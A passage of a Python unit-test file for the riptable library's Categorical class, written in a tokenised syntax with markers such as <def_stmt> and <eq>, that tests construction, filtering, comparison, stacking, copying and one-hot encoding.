<def_stmt>test_map_non_integer self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical([1.0 2.0 3.0] {1:'a' 2:'b' 3:'c'})<block_end><block_end><def_stmt>test_category_multi_arrays self<block_start><with_stmt>pytest.raises(TypeError)<block_start>c=Categorical([1 2 3] [np.arange(5) np.arange(5)])<block_end><block_end><def_stmt>test_getitem_enum_list2 self<block_start>c=Categorical([1 1 2 3 1] {'a':1 'b':2 'c':3})<line_sep>d=c[[1 2 3]]<assert_stmt>d[0]<eq>'a'<block_end><def_stmt>test_tuple_compare_error self<block_start>c=Categorical([FastArray(['a' 'b' 'c' 'a']) FastArray([1 2 3 1])])<with_stmt>pytest.raises(ValueError)<block_start>_=c<eq>('a' 'b' 'c')<block_end><block_end><def_stmt>test_filter_out_bytes_from_unicode self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'] unicode=<true> invalid=b'a')<assert_stmt>bool(np.all(c._fa<eq>[1 1 2 3 1]))<assert_stmt>c.category_array.dtype.char<eq>'U'<assert_stmt>'a'<in>c.category_array<block_end><def_stmt>test_bytes_compare_multikey self<block_start>c=Categorical([np.array(['a' 'b' 'c' 'a']) FastArray([1 2 3 1])] unicode=<true>)<line_sep>cols=c.category_dict<line_sep>bytescol=list(cols.values())[0]<assert_stmt>bytescol.dtype.char<eq>'U'<line_sep>result=c<eq>(b'a' 1)<assert_stmt>bool(np.all(FastArray([<true> <false> <false> <true>])<eq>result))<block_end><def_stmt>test_cat_zero_wronge_base self<block_start><with_stmt>pytest.raises(ValueError)<block_start>c=CatZero(['a' 'a' 'b' 'c' 'a'] base_index=1)<block_end><block_end><def_stmt>test_preserve_name self<block_start>ds=TypeRegister.Dataset({'strcol':np.random.choice(['a' 'b' 'c'] 10) 'numcol':arange(10)})<line_sep>c=Categorical(ds.strcol)<assert_stmt>c.get_name()<eq>'strcol'<line_sep>c=Categorical([ds.strcol ds.numcol])<line_sep>ds2=c.sum(arange(10))<line_sep>labels=ds2.label_get_names()<assert_stmt>labels[0]<eq>'strcol'<assert_stmt>labels[1]<eq>'numcol'<line_sep>ds=TypeRegister.Dataset({'mycodes':np.random.randint(1 4 10)})<line_sep>c=Categorical(ds.mycodes {'a':1 'b':2 'c':3})<assert_stmt>c.get_name()<eq>'mycodes'<line_sep>codes=np.random.randint(1 4 10)<line_sep>cats=FastArray(['a' 'b' 'c'])<line_sep>cats.set_name('test')<line_sep>c=Categorical(codes cats)<assert_stmt>c.get_name() 'test'<block_end><def_stmt>test_subarray_name self<block_start>c=Categorical(['a' 'b'])<line_sep>c1=c[[0]]<assert_stmt>c1.get_name()<eq>c.get_name()<line_sep># Make sure there is no "quantum effect" that printing the array changes it's name.
_=str(c1)<assert_stmt>c1.get_name()<eq>c.get_name()<block_end><def_stmt>test_construct_from_categorical self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'])<line_sep>d=Categorical(c)<assert_stmt>isinstance(d.category_array np.ndarray)<assert_stmt>isinstance(d.expand_array np.ndarray)<line_sep>d2=Categorical([c])<assert_stmt>isinstance(d2.category_array np.ndarray)<assert_stmt>isinstance(d2.expand_array np.ndarray)<block_end><def_stmt>test_total_size self<block_start>c=Categorical(['a' 'a' 'b' 'c' 'a'])<assert_stmt>c._total_size<eq>8<line_sep>c=Categorical([arange(5 dtype=np.int32) arange(5 dtype=np.int32)])<assert_stmt>c._total_size<eq>45<line_sep>c=Categorical([arange(5 dtype=np.int64) arange(5 dtype=np.int64)])<assert_stmt>c._total_size<eq>85<block_end># removed while modifying groupby calculation behavior
# def test_hold_dataset(self):
# ds = TypeRegister.Dataset({'strcol':np.random.choice(['a','b','c'],30), 'numcol':arange(30)})
# c = ds.cat('strcol')
# self.assertTrue(isinstance(c._dataset, TypeRegister.Dataset))
# result = c.sum()
# self.assertTrue(isinstance(result, TypeRegister.Dataset))
# self.assertEqual(result._nrows, 3)
<def_stmt>test_expand_dict self<block_start>og_strings=FastArray(['a' 'a' 'b' 'c' 'a'])<line_sep>og_nums=arange(5)<line_sep>c=Categorical([og_strings og_nums])<line_sep>d=c.expand_dict<assert_stmt>isinstance(d dict)<assert_stmt>len(d)<eq>2<line_sep>dictlist=list(d.values())<assert_stmt>bool(np.all(dictlist[0]<eq>og_strings))<assert_stmt>bool(np.all(dictlist[1]<eq>og_nums))<line_sep>c=Categorical([1 2 3] {'a':1 'b':2 'c':3})<line_sep>d=c.expand_dict<assert_stmt>isinstance(d dict)<assert_stmt>len(d)<eq>1<line_sep>dictlist=list(d.values())<assert_stmt>bool(np.all(dictlist[0]<eq>arange(1 4)))<line_sep>c=Categorical(np.random.randint(0 10 100_100))<with_stmt>pytest.warns(UserWarning)<block_start>d=c.expand_dict<block_end><block_end><def_stmt>test_expand_array self<block_start>c=Categorical([1 2 3] {'a':1 'b':2 'c':3})<line_sep>arr=c.expand_array<assert_stmt>bool(np.all(arr<eq>arange(1 4)))<line_sep>c=Categorical([FastArray(['a' 'b' 'c' 'a']) FastArray([1 2 3 1])])<line_sep># expand array now works on multikey categoricals, returns a tuple of expanded arrays SJK: 4/29/2019
multi_expand=c.expand_array<assert_stmt>isinstance(multi_expand tuple)<assert_stmt>len(multi_expand)<eq>2<assert_stmt>bool(np.all(FastArray(['a' 'b' 'c' 'a'])<eq>multi_expand[0]))<assert_stmt>bool(np.all(FastArray([1 2 3 1])<eq>multi_expand[1]))<line_sep>c._fa[:]=0<line_sep>multi_expand=c.expand_array<assert_stmt>bool(np.all(isnan(multi_expand[1])))<assert_stmt>bool(np.all(multi_expand[0]<eq>b'Filtered'))<block_end><def_stmt>test_true_false_spacer self<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>t_true=c._tf_spacer(['test' <true>])<assert_stmt>t_true<eq>'testTrue '<line_sep>t_false=c._tf_spacer(['test' <false>])<assert_stmt>t_false<eq>'testFalse'<block_end><def_stmt>test_mapping_hstack self<block_start>c1=Categorical([1 1 1 1 2 3] {'a':1 'b':2 'c':3})<line_sep>c2=Categorical([1 1 1 1 3 4] {'a':1 'c':3 'd':4})<line_sep>stacked=Categorical.hstack([c1 c2])<assert_stmt>stacked.unique_count<eq>4<assert_stmt>stacked.from_category('b')<eq>2<assert_stmt>stacked.from_category('d')<eq>4<assert_stmt>len(stacked)<eq>12<line_sep>c1=Categorical([1 1 1 1 2 3] {'a':1 'b':2 'd':3})<line_sep>c2=Categorical([1 1 1 1 3 4] {'a':1 'c':3 'd':4})<line_sep># removed, hstack now relies on unique codes only SJK: 3/5/2019
# with self.assertRaises(TypeError):
# c3 = Categorical.hstack([c1, c2])
<block_end><def_stmt>test_matlab_nan self<block_start>dts=[np.int8 np.int16 np.int32 np.int64]<line_sep>matlab_float_idx=FastArray([1.0 0.0 np.nan])<line_sep>matlab_cats=['a' 'b']<for_stmt>dt dts<block_start>c=Categorical(matlab_float_idx matlab_cats dtype=dt from_matlab=<true>)<assert_stmt>bool(np.all(c._fa<eq>[1 0 0])) f'failed to flip nan to zero for dtype {dt}'<assert_stmt>np.dtype(dt)<eq>c.dtype<block_end><block_end><def_stmt>test_from_provided_with_filter self# not found and filter
<block_start>c=Categorical(['a' 'a' 'b' 'c' 'd'] ['a' 'b' 'c'] filter=FastArray([<false> <false> <true> <true> <false>]) invalid='INVALID' )<line_sep>c.filtered_set_name('INVALID')<line_sep>correct=FastArray([b'INVALID' b'INVALID' b'b' b'c' b'INVALID'])<assert_stmt>bool(np.all(c.expand_array<eq>correct))<line_sep># filter only (uses default invalid)
c=Categorical(['a' 'a' 'b' 'c'] ['a' 'b' 'c'] filter=FastArray([<false> <false> <true> <true>]) )<line_sep>f=c.filtered_name<line_sep>correct=FastArray([f f b'b' b'c'])<assert_stmt>bool(np.all(c.expand_array<eq>correct))<line_sep># even though filtered out, categories still untouched
correct=FastArray([b'a' b'b' b'c'])<assert_stmt>bool(np.all(c.category_array<eq>correct))<line_sep># filtering not allowed for base index 0
<with_stmt>pytest.raises(ValueError)<block_start>c=Categorical(['a' 'a' 'b' 'c'] ['a' 'b' 'c'] filter=FastArray([<false> <false> <true> <true>]) base_index=0 )<block_end><block_end><def_stmt>test_numeric_invalid self# 5/16/2019 invalid category must be in provided uniques
<block_start>c=Categorical([1.0 1.0 2.0] [1.0 2.0] invalid=2.0)<assert_stmt>c._fa[2]<eq>2<line_sep>num=c.sum(arange(1 4)).col_0[0]<assert_stmt>num<eq>3<block_end><def_stmt>test_get_groupings self<block_start>g,f,n=(FastArray([2 3 0 4 1]) FastArray([0 0 2 4]) FastArray([0 2 2 1]) )<line_sep>c=Categorical(['b' 'c' 'a' 'a' 'b'] base_index=0)<line_sep>gg=c.get_groupings()<line_sep>group=gg['iGroup']<line_sep>first=gg['iFirstGroup']<line_sep>ncount=gg['nCountGroup']<assert_stmt>bool(np.all(g<eq>group))<assert_stmt>bool(np.all(f<eq>first))<assert_stmt>bool(np.all(n<eq>ncount))<line_sep>c=Categorical(['b' 'c' 'a' 'a' 'b'] base_index=1)<line_sep>gg=c.get_groupings()<line_sep>group=gg['iGroup']<line_sep>first=gg['iFirstGroup']<line_sep>ncount=gg['nCountGroup']<assert_stmt>bool(np.all(g<eq>group))<assert_stmt>bool(np.all(f<eq>first))<assert_stmt>bool(np.all(n<eq>ncount))<block_end><def_stmt>test_repr self# just make sure no error for coverage
<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>r=c.__repr__()<assert_stmt>r f"Representation should not be empty for Categorical '{c}'."<assert_stmt>isinstance(r str)<block_end><def_stmt>test_copy_deep self<block_start>c=Categorical(['a' 'b' 'c'])<line_sep>d=c.copy(deep=<true>)<line_sep>d[0]='b'<assert_stmt>c[0]<eq>'a'<assert_stmt>c._fa[0]<eq>1<assert_stmt>d[0]<eq>'b'<assert_stmt>d._fa[0]<eq>2<block_end><def_stmt>test_copy_new_filter self<block_start>a=Categorical('A B A B A B'.split())<line_sep>b=Categorical('B A B A B A'.split())<line_sep>c=a.copy()<line_sep>f=c<eq>'A'<line_sep>c[f]=b[f]<assert_stmt>c[0]<eq>'B'<assert_stmt>c[1]<eq>'B'<assert_stmt>a[0]<eq>'A'<assert_stmt>a[1]<eq>'B'<assert_stmt>b[0]<eq>'B'<assert_stmt>b[1]<eq>'A'<block_end><def_stmt>test_setitem_tuple self<block_start>c=Categorical([arange(5) arange(5)])<line_sep>c[0]=(1 1)<assert_stmt>c._fa[0]<eq>2<block_end><def_stmt>test_nunique self<block_start>codes=np.random.randint(0 3 1000)<line_sep>d={0:'All' 1:'ManualAndQuasi' 2:'Manual'}<line_sep>c=Categorical(codes d)<line_sep>n=c.nunique()<assert_stmt>n<eq>3<assert_stmt>len(c.unique())<eq>3<line_sep>codes=np.ones(1000 dtype=np.int32)<line_sep>c=Categorical(codes d)<line_sep>n=c.nunique()<assert_stmt>n<eq>1<assert_stmt>len(c.unique())<eq>1<line_sep>codes=arange(5)<line_sep>c=Categorical(codes d)<line_sep>n=c.nunique()<assert_stmt>n<eq>5<assert_stmt>len(c.unique())<eq>5<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'd'] ['a' 'b' 'c' 'd'])<line_sep>n=c.nunique()<assert_stmt>n<eq>4<assert_stmt>len(c.unique())<eq>4<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'd'] ['a' 'b' 'c' 'd'] base_index=0)<line_sep>n=c.nunique()<assert_stmt>n<eq>4<assert_stmt>len(c.unique())<eq>4<line_sep>c=Categorical(['a' 'a' 'b' 'c' 'd'])<line_sep>c[2]=0<line_sep>n=c.nunique()<assert_stmt>n<eq>3<assert_stmt>len(c.unique())<eq>3<assert_stmt>c.unique_count<eq>4<line_sep>c=Categorical([arange(3) np.array(['a' 'b' 'c'])])<line_sep>c[0]=0<line_sep>n=c.nunique()<assert_stmt>n<eq>2<assert_stmt>c.unique_count<eq>3<line_sep># The following assertion is moved to it's own unit pytest along with an xfail.
# found below and named test_multikey_categorical_unique.
# assert len(c.unique()) == 2
<block_end><def_stmt>test_unique self<block_start>l=list('xyyz')<line_sep>c,c_sub=rt.Cat(l) rt.Cat(l[:3])<line_sep>assert_array_equal(c.unique() c.category_array 'mismatch between unique categories and category array')<line_sep>assert_array_equal(c.unique() c.category_array.unique() 'mismatch between unique categories and expanded category array')<assert_stmt>c.nunique()<eq>3 'mismatch in number of unique categories'<line_sep>assert_array_equal(c[:3].unique() c_sub.category_array 'mismatch between unique categories and category array with sliced categorical')<line_sep>assert_array_equal(c[:3].unique() c_sub.category_array.unique() 'mismatch between unique categories and expanded category array with sliced categorical')<assert_stmt>c[:3].nunique()<eq>2 'mismatch in number of unique categories with sliced categorical'<block_end><def_stmt>test_scalar_unique self<block_start>idx=ones(100)<line_sep>cats=700_000.0<line_sep>c=Categorical(idx cats from_matlab=<true>)<assert_stmt>isinstance(c Categorical)<assert_stmt>c.unique_count<eq>1<block_end><def_stmt>test_stack_multikey self# TODO pytest parameterize the strings
<block_start>strs=FA(np.random.choice(['aaaaa' 'b' 'ccc'] 23))<line_sep>flts=np.random.choice([7.14 6.66 5.03] 23)<line_sep>c1=Categorical([strs flts])<line_sep>c1_str=Categorical(strs)<line_sep>c1_flt=Categorical(flts)<line_sep>strs2=FA(np.random.choice(['b' 'aaaaa'] 17))<line_sep>flts2=np.random.choice([5.03 7.14] 17)<line_sep>c2=Categorical([strs2 flts2])<line_sep>c2_str=Categorical(strs2)<line_sep>c2_flt=Categorical(flts2)<line_sep>fa_str=hstack([strs strs2])<line_sep>fa_flt=hstack([flts flts2])<line_sep># TODO add assertions for multikey Categoricals
c_str=Categorical(fa_str)<line_sep>c_flt=Categorical(fa_flt)<line_sep># TODO move these into SDS save / load tests
paths=[r'riptable/tests/temp/ds1.sds' r'riptable/tests/temp/ds2.sds']<line_sep>ds1=Dataset({'mkcat':c1 'strcat':c1_str 'fltcat':c1_flt 'strfa':strs 'fltfa':flts })<line_sep>ds2=Dataset({'mkcat':c2 'strcat':c2_str 'fltcat':c2_flt 'strfa':strs2 'fltfa':flts2 })<line_sep>ds1.save(paths[0])<line_sep>ds2.save(paths[1])<line_sep># normal dataset hstack
hstack_ds=hstack([ds1 ds2])<assert_stmt>isinstance(hstack_ds Dataset)<line_sep># dataset hstack from load
stack_load_ds=load_sds(paths stack=<true>)<assert_stmt>isinstance(stack_load_ds PDataset)<line_sep># multikey cat hstack
hstack_mkcats=hstack([c1 c2])<assert_stmt>isinstance(hstack_mkcats Categorical)<line_sep># normal array hstack
hstack_strs=hstack([strs strs2])<line_sep>hstack_flts=hstack([flts flts2])<line_sep># single cat hstack
hstack_cstrs=hstack([c1_str c2_str])<assert_stmt>isinstance(hstack_cstrs Categorical)<line_sep>hstack_cflts=hstack([c1_flt c2_flt])<assert_stmt>isinstance(hstack_cflts Categorical)<assert_stmt>bool(np.all(hstack_strs<eq>hstack_cstrs.expand_array))<assert_stmt>bool(np.all(hstack_flts<eq>hstack_cflts.expand_array))<line_sep>mktup=[*hstack_mkcats.category_dict.values()]<assert_stmt>bool(np.all(hstack_mkcats._expand_array(mktup[0])<eq>fa_str))<assert_stmt>bool(np.all(hstack_mkcats._expand_array(mktup[1])<eq>fa_flt))<line_sep>mktup2=[*stack_load_ds.mkcat.category_dict.values()]<assert_stmt>bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[0])<eq>fa_str))<assert_stmt>bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[1])<eq>fa_flt))<line_sep>mktup3=[*hstack_ds.mkcat.category_dict.values()]<assert_stmt>bool(np.all(hstack_ds.mkcat._expand_array(mktup3[0])<eq>fa_str))<assert_stmt>bool(np.all(hstack_ds.mkcat._expand_array(mktup3[1])<eq>fa_flt))<for_stmt>p paths<block_start>os.remove(p)<block_end><block_end># TO TEST:
# regular python Enum
# apply / apply_dataset, etc.
# def test_sort_copy(self):
# c = Categorical(np.random.choice(['a','b','c'], 15))
# d = c.sort_copy()
# c = Categorical([np.random.choice(['a','b','c'], 15), np.random.randint(0,3,15)])
# d = c.sort_copy()
# ----------------------------------------------------------
# def test_str_repr(self):
# '''
# SJK: We're still in the early stages of deciding how to print out or summarize a categorical in the workspace.
# Comment it out if repr or str changes, and I will fix up.
# '''
# # no break
# input = ['b', 'b', 'b', 'a', 'b', 'b']
# str_string = ', '.join(input)
# repr_string = "Categorical(["+str_string+"])"
# c = Categorical(input)
# self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# # add break
# slice_size = 5
# input = ['b', 'b', 'b', 'a', 'b', 'b', 'b', 'b', 'b', 'a', 'b', 'b', 'c', 'c']
# str_string = ', '.join(input[:slice_size]+['...']+input[-slice_size:])
# repr_string = "Categorical(["+str_string+"])"
# c = Categorical(input)
# self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
# self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead")
<def_stmt>test_as_string_array self# SJK 10/4/2018 - as string array now returns bytes OR unicode (whatever type the string based categorical is holding)
<block_start>f=np.array([b'b' b'b' b'b' b'a' b'b' b'b'])<line_sep>c=Categorical(f)<line_sep>is_equal=bool(np.all(c.as_string_array<eq>f))<assert_stmt>isinstance(c.as_string_array FastArray) f"Categorical did not return a fastarray in as_string_array"<assert_stmt>(is_equal) f"Categorical returned an incorrect string array {c.as_string_array} view of itself. Expected {f}"<block_end><def_stmt>test_indexing_numeric self<block_start>c=Cat([1.1 2.2 3.3])<line_sep>result=c['2.2']<assert_stmt>np.all(result<eq>[<false> <true> <false>])<block_end><def_stmt>test_fill_forward self<block_start>fa=FA([1. np.nan 1.])<line_sep>c=Cat([1 1 1])<line_sep>c.fill_forward(fa inplace=<true>)<assert_stmt>np.all(fa<eq>[1. 1. 1.])<block_end># TODO pytest parameterize `compare_func_names`
<def_stmt>test_all_compare_tests self# with scalar
# cat(unicode)
<block_start>i=2<line_sep>c1=Categorical(three_ints)<if_stmt>ShowCompareInfo<block_start>print("Categorical:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("Compare unicode to int scalar: 2")<block_end>self.compare_cat_test(c1 compare_func_names int_success i)<line_sep># cat(unicode) / unicode, unicode list
i="AMZN\u2082"<line_sep>c3=Categorical(three_unicode)<if_stmt>ShowCompareInfo<block_start>print("Categorical:" c3)<block_end><if_stmt>ShowCompareInfo<block_start>print("Compare unicode cat to unicode string")<block_end>self.compare_cat_test(c3 compare_func_names int_success i)<if_stmt>ShowCompareInfo<block_start>print("Compare to list of unicode string")<block_end>self.compare_cat_test(c3 compare_func_names int_success [i])<if_stmt>ShowCompareInfo<block_start>print("Compare to a numpy array of unicode string")<block_end>self.compare_cat_test(c3 compare_func_names int_success np.array([i]))<line_sep># cat(bytes) / bytes, bytes list
i=b'b'<line_sep>c4=Categorical(three_bytes)<if_stmt>ShowCompareInfo<block_start>print("Categorical:" c4)<block_end><if_stmt>ShowCompareInfo<block_start>print("Compare bytes cat to bytestring")<block_end>self.compare_cat_test(c4 compare_func_names int_success i)<if_stmt>ShowCompareInfo<block_start>print("Compare to bytestring in list")<block_end>self.compare_cat_test(c4 compare_func_names int_success [i])<if_stmt>ShowCompareInfo<block_start>print("Compare to bytestring in numpy array")<block_end>self.compare_cat_test(c4 compare_func_names int_success np.array([i]))<line_sep># cat(bytes) / unicode, unicode list
i="b"<line_sep>c5=Categorical(three_bytes)<if_stmt>ShowCompareInfo<block_start>print("Categorical:" c5)<block_end><if_stmt>ShowCompareInfo<block_start>print("Compare bytes cat to unicode string")<block_end>self.compare_cat_test(c5 compare_func_names int_success i)<if_stmt>ShowCompareInfo<block_start>print("Compare to unicode string in list")<block_end>self.compare_cat_test(c5 compare_func_names int_success [i])<if_stmt>ShowCompareInfo<block_start>print("Compare to unicode string in numpy array")<block_end>self.compare_cat_test(c5 compare_func_names int_success np.array([i]))<line_sep># equal categoricals (same dictionary)
# cat(bytes) / cat(bytes)
<if_stmt>ShowCompareInfo<block_start>print("Compare two equal categoricals:")<block_end><if_stmt>ShowCompareInfo<block_start>print("Both from byte lists:")<block_end>c1=Categorical(three_bytes)<line_sep>c2=Categorical(three_bytes)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names same_success c2)<line_sep># cat(unicode) / cat(unicode)
<if_stmt>ShowCompareInfo<block_start>print("Both from unicode lists:")<block_end>c1=Categorical(three_unicode)<line_sep>c2=Categorical(three_unicode)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names same_success c2)<line_sep># cat(unicode) / cat(bytes)
<if_stmt>ShowCompareInfo<block_start>print("unicode/bytes list")<block_end>c1=Categorical(["a" "b" "c"])<line_sep>c2=Categorical(three_bytes)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names same_success c2)<line_sep># unequal categoricals (same dictionary)
# cat(bytes) / cat(bytes)
<if_stmt>ShowCompareInfo<block_start>print("Compare two unequal categoricals (same dict):")<block_end><if_stmt>ShowCompareInfo<block_start>print("both bytes")<block_end>c1=Categorical([0 1 0] three_bytes)<line_sep>c2=Categorical([2 1 2] three_bytes)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names diff_success c2)<line_sep># cat(unicode) / cat(unicode)
<if_stmt>ShowCompareInfo<block_start>print("both unicode")<block_end>c1=Categorical([0 1 0] three_unicode)<line_sep>c2=Categorical([2 1 2] three_unicode)<if_stmt>ShowCompareInfo<block_start>print("cat1:" c1)<block_end><if_stmt>ShowCompareInfo<block_start>print("cat2:" c2)<block_end>self.compare_cat_test(c1 compare_func_names diff_success c2)<line_sep>## cat(bytes) / int list (matching)
# if ShowCompareInfo: print("Compare categorical to matching int list")
# if ShowCompareInfo: print("bytes")
# i = [1,2,3]
# c1 = Categorical(three_bytes)
# self.compare_cat_test(c1,compare_func_names,same_success,i)
## cat(unicode) / int list (matching)
# if ShowCompareInfo: print("unicode")
# c1 = Categorical(three_unicode)
# self.compare_cat_test(c1,compare_func_names,same_success,i)
## cat(bytes) / int list (non-matching)
# if ShowCompareInfo: print("Compare categorical to non-matching int list")
# if ShowCompareInfo: print("bytes")
# i = [3,2,1]
# c1 = Categorical(three_bytes)
# self.compare_cat_test(c1,compare_func_names,int_success,i)
## cat(unicode) / int list(non-matching)
# if ShowCompareInfo: print("unicode")
# c1 = Categorical(three_unicode)
# self.compare_cat_test(c1,compare_func_names,int_success,i)
<block_end># def cat_slicing(self):
# three_unicode =FA(["AAPL\u2080","AMZN\u2082","IBM\u2081"])
# three_bytes = FA([b'a',b'b',b'c'])
# num_rows=8
# idx_size=15
# get_item_dicts = {
# "single_slices" : {
# ":2" : slice(None,2,None),
# "-2:": slice(-2,None,None),
# "2:5": slice(2,5,None),
# "5:" : slice(5,None,None),
# ":" : slice(None,None,None)
# },
# "bool_arrays" : {
# "python_bool" : [True, False, True, False, False, True, True, True, False, True, False, False, True, False, True],
# "numpy_bool" : np.array([True, False, True, False, False, True, True, True, False, True, False, False, True, False, True])
# },
# "int_indices" : { "int_idx_size"+str(idx_size) : np.random.randint(low=0,high=num_rows,size=idx_size) for idx_size in range(1,num_rows) }
# }
# failures = 0
# idx_list = np.random.randint(low=0,high=8,size=15)
# s_list = np.array([b'adam',b'bob',b'charlie',b'david',b'edward',b'frank',b'greg',b'harold'])
# c = Categorical(idx_list, s_list)
# for key, test_dict in get_item_dicts.items():
# print("\n\n"+key)
# for call_str, val in test_dict.items():
# success = s_list[idx_list[val]]
# if np.all(c[val].as_string_array == success):
# message = "success"
# else:
# message = "failure"
# failures += 1
# print(call_str, message)
# print("Tests complete with",failures,"errors")
# return c
@pytest.mark.xfail(reason="RIP-215 - lead to inconsistent Categorical state; please add hypothesis tests when resolved.")<def_stmt>test_category_add self<block_start>cat=Categorical(list("bbcdebc"))<line_sep>e="a"<line_sep>cat.category_add(e)<assert_stmt>e<in>cat "expect the added category to be added to the Categorical"<assert_stmt>e<in>cat._categories "expect the added category to be added to the Categorical._categories"<assert_stmt>e<in>cat.category_array "expect the added category to be added to the Categorical.category_array"<assert_stmt>e<in>cat.category_dict "expect the added category to be added to the Categorical.category_dict"<block_end>@pytest.mark.xfail(reason="RIP-215 - lead to inconsistent Categorical state; please add hypothesis tests when resolved.")<def_stmt>test_category_remove self<block_start>cat=Categorical(list("bbcdebc"))<line_sep>e=cat[0]<line_sep>cat.category_remove(e)<assert_stmt>e<not><in>cat "expect the removed category to be removed from the Categorical"<assert_stmt>e<not><in>cat._categories "expect the removed category to be removed from the Categorical._categories"<assert_stmt>(e<not><in>cat.category_array) "expect the removed category to be removed from the Categorical.category_array"<assert_stmt>(e<not><in>cat.category_dict) "expect the removed category to be removed from the Categorical.category_dict"<block_end># TODO move this to testing utils
<def_stmt>compare_cat_test self cat compare_func_names success_bools i<block_start><for_stmt>fname,success zip(compare_func_names success_bools)<block_start>func=getattr(cat fname)<line_sep>result=func(i)<assert_stmt>np.all(result<eq>success) f'fail on {fname} {cat} {i}'<if_stmt>ShowCompareInfo<block_start><if_stmt>np.all(result<eq>success)<block_start>message="succeeded"<block_end><else_stmt><block_start>message="failed"<block_end>print(fname message)<block_end><block_end><block_end><def_stmt>test_duplicated self<block_start>result=Cat([2 3 2] list('qwery')).duplicated()<assert_stmt>np.all(result<eq>FA([<false> <false> <true>]))<block_end><def_stmt>test_cat_copy self# add deep copy for enum, single, multi
<block_start>x=arange(6 dtype=uint16)<floordiv>2<line_sep>c=Cat(x {0:'Run' 1:'Stop' 2:'Start'} dtype=uint16)<line_sep>c[1]='Start'<line_sep>a=c.copy()<line_sep>d=a[:5]<line_sep>a[1]='Run'<line_sep>b=a[:5]<assert_stmt>a._fa[1]<eq>0<assert_stmt>b._fa[1]<eq>0<assert_stmt>c._fa[1]<eq>2<assert_stmt>d._fa[1]<eq>0<block_end><def_stmt>test_assinglekey self<block_start>c=Cat([1 2 1 2 1 2] {'Sunny':1 'Thunderstorms':2})<line_sep># insert bad value
c._fa[3]=17<line_sep>c1=c.as_singlekey(ordered=<false>)<line_sep>c2=c.as_singlekey(ordered=<true>)<assert_stmt>np.all(c1.expand_array<eq>c2.expand_array)<line_sep>c=Cat([-1 -2 -1 -2 -1 -2] {'Sunny':-1 'Thunderstorms':-2})<line_sep>c._fa[3]=17<line_sep>c3=c.as_singlekey(ordered=<false>)<line_sep>c2=c.as_singlekey(ordered=<true>)<assert_stmt>np.all(c1.expand_array<eq>c2.expand_array)<assert_stmt>np.all(c3.expand_array<eq>c2.expand_array)<block_end><block_end># Cannot use the pytest.mark.parameterize decorator within classes that inherit from unittest.TestCase.
# Will need to migrate for unittest to pytest and fold the following categorical tests into Categorical_Test.
@pytest.mark.parametrize("categoricals" [# Categorical constructed from python list data
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_list_values" ) # Categorical constructed from numpy array
pytest.param([Categorical(np.array(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_np_array_values" ) # Categorical constructed from riptable fast array
pytest.param([Categorical(rt.FastArray(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_rt_fastarray_values" ) # failed test cases
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method(CategoryMode.MultiKey)] marks=[pytest.mark.xfail(reason="RIP-410 - Bug for MultiKey Categoricals: AttributeError: 'Categorical' object has no attribute 'ismultikey_labels'")] id="cat_with_tuple_values" ) ] )<def_stmt>test_one_hot_encode categoricals<block_start><for_stmt>categorical categoricals<block_start>col_names,encoded_arrays=categorical.one_hot_encode()<line_sep>category_array=categorical.category_array.astype('U')<line_sep># Test 1.1 The col_names are the same as the category array.
<assert_stmt><not>set(category_array).symmetric_difference(set(col_names)) (f"The column names should be the same as the names in the category array" f"category array {category_array}\ncolumn names {col_names}" )<line_sep># Test 1.2 The encoded_arrays dtypes are consistent with one another.
encoded_arrays_dtypes=set([fa.dtype<for>fa encoded_arrays])<assert_stmt>(len(encoded_arrays_dtypes)<eq>1) f"Encoded array dtypes should be consistent, got {encoded_arrays_dtypes}"<line_sep># todo for each category, assert the mask of the categorical is in the encoded_arrays
<block_end><block_end>@pytest.mark.parametrize("categoricals" [# Categorical constructed from python list data
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_list_values" ) # Categorical constructed from numpy array
pytest.param([Categorical(np.array(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_np_array_values" ) # Categorical constructed from riptable fast array
pytest.param([Categorical(rt.FastArray(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_rt_fastarray_values" ) ] )<def_stmt>test_shift_cat categoricals# todo Handle numeric invalid types for categoricals with values other than strings.
<block_start>filtered_name=rt.rt_enum.FILTERED_LONG_NAME.encode("utf-8")<for_stmt>categorical categoricals<block_start>cat_len=len(categorical)<for_stmt>i range(-cat_len+1 cat_len)# exhaustive shift of all Categorical values.
# shift the categorical i-places
<block_start>shift_cat=categorical.shift_cat(i)<line_sep># The category array should remain unchanged.
